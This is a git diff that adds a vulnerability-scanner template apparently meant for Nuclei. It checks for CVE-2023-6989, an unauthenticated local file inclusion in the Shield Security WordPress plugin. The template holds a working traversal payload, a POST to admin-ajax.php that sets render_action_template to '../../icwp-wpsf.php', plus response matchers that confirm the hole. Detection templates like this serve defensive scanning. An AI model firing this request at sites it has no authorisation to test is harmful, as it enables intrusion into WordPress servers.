diff --git a/http/cves/2023/CVE-2023-6989.yaml b/http/cves/2023/CVE-2023-6989.yaml new file mode 100644 index 0000000000..1afc431161 --- /dev/null +++ b/http/cves/2023/CVE-2023-6989.yaml @@ -0,0 +1,55 @@ +id: CVE-2023-6989 + +info: + name: Shield Security WP Plugin <= 18.5.9 - Unauthenticated Local File Inclusion + author: Kazgangap + severity: critical + description: | + The Shield Security Smart Bot Blocking & Intrusion Prevention Security plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 18.5.9 via the render_action_template parameter. This makes it possible for unauthenticated attacker to include and execute PHP files on the server, allowing the execution of any PHP code in those files. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2023-6989 + - https://www.cvedetails.com/cve/CVE-2023-6989/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2023-6989 + cwe-id: CWE-22 + epss-score: 0.00282 + epss-percentile: 0.68187 + cpe: cpe:2.3:a:getshieldsecurity:shield_security:*:*:*:*:*:wordpress:*:* + metadata: + vendor: getshieldsecurity + product: shield_security + framework: wordpress + tags: wordpress,plugin,lfi + +http: + - method: POST + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php" + + headers: + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 + Accept: "*/*" + Accept-Language: en-US,en;q=0.5 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + X-Requested-With: XMLHttpRequest + Connection: close + Sec-Fetch-Dest: empty + Sec-Fetch-Mode: cors + Sec-Fetch-Site: same-origin + + body: | + action=shield_action&ex=generic_render&exnonce=5a988a925a&render_action_template=../../icwp-wpsf.php + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - '"dashboard_shield"' + - '"shield_action"' + - '"search_shield"' \ No newline at end of file